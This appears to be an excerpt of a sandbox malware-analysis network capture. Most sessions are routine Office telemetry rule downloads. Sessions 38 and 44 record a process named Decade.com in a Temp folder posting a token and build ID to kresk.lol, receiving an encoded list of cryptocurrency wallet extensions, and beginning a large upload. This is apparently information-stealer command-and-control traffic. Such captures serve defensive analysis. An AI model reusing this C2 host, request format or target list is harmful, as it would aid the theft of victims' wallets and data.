33	192.168.2.4	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:13 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:14 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:14 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111714Z-1746fd949bd54zxghC1EWRzre400000001c0000000005ubz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:14 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:13 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:14 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:14 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111714Z-1746fd949bddgsvjhC1EWRum2c000000018g000000009ehe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:14 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:13 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:14 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:14 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: daea1f5e-401e-005b-68d1-459c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111714Z-1746fd949bdfg4slhC1EWR34t000000000wg0000000088ss x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:14 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:13 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:14 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:14 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 490c4061-c01e-000b-75c3-45e255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111714Z-1746fd949bdl6zq5hC1EWRf3ws00000000x0000000000e81 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:14 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:13 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:14 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:14 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111714Z-1746fd949bd6zq92hC1EWRry48000000013g000000003xv3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:14 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49774	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:14 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----RQ9000R1N7QIM7Y5XBIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:14 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 51 39 30 30 30 52 31 4e 37 51 49 4d 37 59 35 58 42 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 52 51 39 30 30 30 52 31 4e 37 51 49 4d 37 59 35 58 42 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 52 51 39 30 30 30 52 31 4e 37 51 49 4d 37 59 35 58 42 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------RQ9000R1N7QIM7Y5XBIEContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------RQ9000R1N7QIM7Y5XBIEContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------RQ9000R1N7QIM7Y5XBIECont
2024-12-04 11:17:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:15 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:15 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:16 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:16 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: de9014ac-301e-0051-7cc5-4538bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111716Z-1746fd949bd6zq92hC1EWRry4800000000z00000000090rf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:16 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49776	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:15 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:16 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:16 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 4626c155-d01e-0017-0ecc-45b035000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111716Z-1746fd949bddgsvjhC1EWRum2c00000001c0000000005x5r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:16 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49777	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:16 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:16 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:16 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111716Z-1746fd949bdzd2qvhC1EWRcygw00000000tg000000006kty x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:16 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49778	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:16 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:16 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:16 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111716Z-1746fd949bdjrnwqhC1EWRpg280000000120000000009hge x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:16 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:16 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:16 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:16 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 8da67b63-c01e-0034-2ecb-452af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111716Z-1746fd949bdjrnwqhC1EWRpg28000000015g000000005gzn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:16 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49780	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:16 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----E3E3OPZUA1N7YU3OPH4W User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 7777 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:16 UTC	7777	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 